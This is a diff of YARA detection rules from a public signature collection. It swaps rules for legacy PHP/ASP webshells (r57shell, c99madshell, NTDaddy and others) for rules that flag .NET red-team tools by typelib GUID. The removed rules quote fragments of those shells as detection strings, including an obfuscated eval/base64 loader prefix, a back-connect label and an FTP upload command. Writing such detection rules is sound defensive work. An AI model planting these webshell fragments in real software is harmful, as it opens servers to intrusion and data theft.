+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4792-L4805"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
-		logic_hash = "d6bd782302b2c614fc572babb3825c0e1fcd0de5841ca8541ca27580ccc274d4"
+		logic_hash = "38858c4e5f13eea32d47178a9221a35be92c9fbb408a542a712ce9b708591e42"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "mailto:rhfactor@antisocial.com"
-		$s2 = "?raiz=root"
-		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
-		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
+		$typelibguid0lo = "b016da9e-12a1-4f1d-91a1-d681ae54e92c" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_NT_Addy_Asp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpchromium : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file NT Addy.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "18f5f360-8690-5e09-ac18-b8cc4f678811"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3795-L3807"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5364956a-e199-556a-8055-0e7b9a7b14c8"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/djhohnstein/SharpChromium"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4807-L4820"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2e0d1bae844c9a8e6e351297d77a1fec"
-		logic_hash = "0fc61d5e276786b8be822712cdcfc81146998e535532e44d3da92e0668713a48"
+		logic_hash = "f675d60987e5791550dff9cccc00109a2e30971de12c7f4c77288cf34122f7f2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
-		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
-		$s4 = "RAW D.O.S. COMMAND INTERFACE"
+		$typelibguid0lo = "2133c634-4139-466e-8983-9a23ec99e01b" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Simattacker___Vrsion_1_0_0___Priv8_4_My_Friend_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Get_RBCD_Threaded : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "8a34f4fd-337d-5eb4-b7b7-4adb1c2b7937"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3808-L3820"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fdef6dc3-da1a-5a98-a822-94e443981fdd"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/FatRodzianko/Get-RBCD-Threaded"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4822-L4835"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
-		logic_hash = "46bc4063d06b4af3e4e61e1e998d489e974e76f17363c9777b8afc39ff21f698"
+		logic_hash = "a3cb7097f5fd5a2e5eac5ace774ea4e7f845989ee953f5aa140b0e05f3d04380"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
-		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
-		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
+		$typelibguid0lo = "e20dc2ed-6455-4101-9d78-fccac1cb7a18" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Remexp_Asp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Whisker : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file RemExp.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "900036ce-ff13-5441-bb77-906ea08a4ca0"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3821-L3833"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ecb0c59f-2111-58d9-8dc9-dfe005cad3be"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/eladshamir/Whisker"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4837-L4850"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
-		logic_hash = "c7da9908a0252e95b47dbc8fbb36aeac1661dc464123aaca036bd51047a31584"
+		logic_hash = "2d0e0436f83b5e4c4e2e7ef7237d5769a901f35b0462d5396bb5e398a72176dd"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<title>Remote Explorer</title>"
-		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
-		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+		$typelibguid0lo = "42750ac0-1bff-4f25-8c9d-9af144403bad" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Phvayvv_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Shadowspray : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "76351a59-8f52-5110-a9b8-36edd59026df"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3834-L3846"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "91dd52ef-07a1-5ffd-b5c3-59bca18d4c7c"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/Dec0ne/ShadowSpray"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4852-L4865"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "35fb37f3c806718545d97c6559abd262"
-		logic_hash = "503a69a7e2c30cc82eba430082627bb93c459a95f675b968126bf4524c598863"
+		logic_hash = "d45c8c20a782dbcb80db5c990ce02f6227e40a8b6d9875b1158735c5a53d4771"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
-		$s1 = "$baglan=fopen($duzkaydet,'w');"
-		$s2 = "PHVayv 1.0"
+		$typelibguid0lo = "7e47d586-ddc6-4382-848c-5cf0798084e1" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Klasvayv_Asp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Malsccm : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file klasvayv.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "3ca4c20c-f879-55a0-9070-d40fc903f9ae"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3847-L3860"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4a88532b-e2bc-5ce9-828d-6ef62d91f6b9"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/nettitude/MalSCCM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4867-L4880"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2b3e64bf8462fc3d008a3d1012da64ef"
-		logic_hash = "eb1b11e02b075a4e7d28b77cf91ad596a85e4c697a36304ee177d46735965e75"
+		logic_hash = "064835e594c8e28903e5e18aa63c8bda53e74ddb3b8eda813ac62c7677b4e3fc"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"
-		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
-		$s3 = "<font color=\"#858585\">www.aventgrup.net"
-		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
+		$typelibguid0lo = "5439cecd-3bb3-4807-b33f-e4c299b71ca2" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_R57Shell_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Spoolsample : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file r57shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "1f1070e8-e82c-5cae-a64a-cd5028adae97"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3861-L3874"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "38346575-cf5b-59bf-b2b2-21aacf05b8a4"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/leechristensen/SpoolSample"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4882-L4895"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d28445de424594a5f14d0fe2a7c4e94f"
-		logic_hash = "658eec4f3c463ec1a480bcb7ba995b8d81d1fb846832e569751d9f505f0fa87e"
+		logic_hash = "8633b34f478b3d581f9403909d2ee20e7049d3ea02ecaf4fcb5dd61909681ba4"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
-		$s2 = "RusH security team"
-		$s3 = "'ru_text12' => 'back-connect"
-		$s4 = "<title>r57shell</title>"
+		$typelibguid0lo = "640c36b4-f417-4d85-b031-83a9d23c140b" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Rst_Sql_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpoxidresolver : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3875-L3888"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e8a957bc-3319-51c2-8289-01bd0b8a632a"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/S3cur3Th1sSh1t/SharpOxidResolver"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4897-L4910"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0961641a4ab2b8cb4d2beca593a92010"
-		logic_hash = "d15cf69d9ad8683d2ac1ff09b08b0b26ecaf35df8e45bbd5c3a02c393f88cb34"
+		logic_hash = "168d2d817fecdb9a457af26668f6e543556901151b025d322a4cfd63106cafed"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "C:\\tmp\\dump_"
-		$s1 = "RST MySQL"
-		$s2 = "http://rst.void.ru"
-		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
+		$typelibguid0lo = "ce59f8ff-0ecf-41e9-a1fd-1776ca0b703d" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Wh_Bindshell_Py
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcat : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "b7acbfe7-fd28-5832-9af2-1c5befe4bbab"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3889-L3901"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "450d13c6-93ae-5bf5-bdde-d874ab6c0cd5"
+		date = "2023-11-30"
+		modified = "2025-08-18"
+		reference = "https://github.com/theart42/Sharpcat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4912-L4924"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fab20902862736e24aaae275af5e049c"
-		logic_hash = "e38a4f5c23371705f9bbf2db8e65d68074554edc1022576166e76d40e06bc039"
+		logic_hash = "143757610d66c5d7bbba96ef810d518f38ad8ea0e924be23aa59e8c514154fe0"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "#Use: python wh_bindshell.py [port] [password]"
-		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
-		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
+		$typelibguid0 = "d16fd95f-23ce-4f8d-8763-b9f5a9cdd0c3" ascii nocase wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Lurm_Safemod_On_Cgi
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpnamedpipepth : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "74e77260-a547-5553-8430-2620f8549f50"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3902-L3914"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "561b95a5-f32b-5fe8-9e67-3f702306be93"
+		date = "2023-11-30"
+		modified = "2025-08-18"
+		reference = "https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4926-L4938"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5ea4f901ce1abdf20870c214b3231db3"
-		logic_hash = "d308ad6cda92fa437b9a4c46cd1b97fb0138aa8d0010256bda56a64ced1c7875"
+		logic_hash = "437a8a41073174e86f642717537bdeeb5343cc8683c95477a52d6801a46aac21"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Network security team :: CGI Shell" fullword
-		$s1 = "#########################<<KONEC>>#####################################" fullword
-		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
+		$typelibguid0 = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii nocase wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_C99Madshell_V2_0_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharptokenfinder : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "b0724920-dc1e-5819-a99b-618a9a7e1eca"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3915-L3925"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "60fd06be-041b-5fa8-8f25-41b26605ea90"
+		date = "2023-12-06"
+		modified = "2025-08-18"
+		reference = "https://github.com/HuskyHacks/SharpTokenFinder"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4940-L4952"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d27292895da9afa5b60b9d3014f39294"
-		logic_hash = "07922511d9dfdd32f6b1f47479fca2063b773024a20dcab6f5cf4d56d66c3397"
+		logic_hash = "f9681a13b094b6e05cab69f0684d52e3bb3b465cfcdb1c83a890c9c8fda79169"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
+		$typelibguid0 = "572804d3-dbd6-450a-be64-2e3cb54fd173" ascii nocase wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Backupsql_Php_Often_With_C99Shell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharprodc : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file backupsql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3926-L3937"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "60779e7a-048f-5095-b853-fd90c4f7449e"
+		date = "2023-12-06"
+		modified = "2025-08-18"
+		reference = "https://github.com/wh0amitz/SharpRODC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4954-L4966"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
-		logic_hash = "7c64e3d4e5815859c51f05cb376f72ea266b31193f3f4588526005e167ebabad"
+		logic_hash = "3d24237804509d2bf241f7310843591608a9d7e8abb38eb324aa5909995ebfaf"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
-		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+		$typelibguid0 = "d305f8a3-019a-4cdf-909c-069d5b483613" ascii nocase wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Uploader_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Gmsapasswordreader : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file uploader.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "62aa783b-f12f-5bb5-9d96-7aee1666788b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3938-L3950"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "dc74bfce-90a1-53bd-bfe4-cb7c9c75da53"
+		date = "2023-12-06"
+		modified = "2025-08-18"
+		reference = "https://github.com/rvazarkar/GMSAPasswordReader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4968-L4980"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0b53b67bb3b004a8681e1458dd1895d0"
-		logic_hash = "6e6ffc4cad2a956cb2b6667928bac5996cf95cd36f43ba789144c46726471f07"
+		logic_hash = "8db260b15b8b8158e5f66268b9086b456386af017e4351025ea27b9f994e5bf5"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
-		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
-		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
+		$typelibguid0 = "c8112750-972d-4efa-a75b-da9b8a4533c7" ascii nocase wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Telnet_Pl
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsharefinder : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file telnet.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "be4de017-e929-5dd3-a60e-f187456b1a55"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3951-L3962"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bb485347-ea9b-5f26-99ad-bedc38bfecd5"
+		date = "2023-12-19"
+		modified = "2025-08-18"
+		reference = "https://github.com/mvelazc0/SharpShareFinder"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4982-L4994"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dd9dba14383064e219e29396e242c1ec"
-		logic_hash = "2d1abc52fc70ce664a19e49e6fa4175bc8d8785dee332d5273323479d9628a8c"
+		logic_hash = "72b2c6c9f4da68ba8e9656ff2d9da962f9d791f031c1d7fb74d74ddd17ba49de"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "W A R N I N G: Private Server"
-		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
+		$typelibguid0 = "64bfeb18-b65c-4a83-bde0-b54363b09b71" ascii nocase wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_W3D_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Postdump : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file w3d.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "1a4e3c84-2d3b-5245-bccc-9a5f59b9fc17"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3963-L3975"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "7f33e76c-0227-5c23-b821-c5c9753e2384"
+		date = "2023-12-19"
+		modified = "2025-08-18"
+		reference = "https://github.com/YOLOP0wn/POSTDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4997-L5009"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "987f66b29bfb209a0b4f097f84f57c3b"
-		logic_hash = "33f948a1ae4474daddd788df84fa8baabf4390ec242cad9a6a51dac0152d3b75"
+		logic_hash = "e5bbef2fe7122855d7e5300ebf78631149e60b08793a4a21a4ac8b337f4bee60"
 		score = 75
-		quality = 85
-		tags = ""
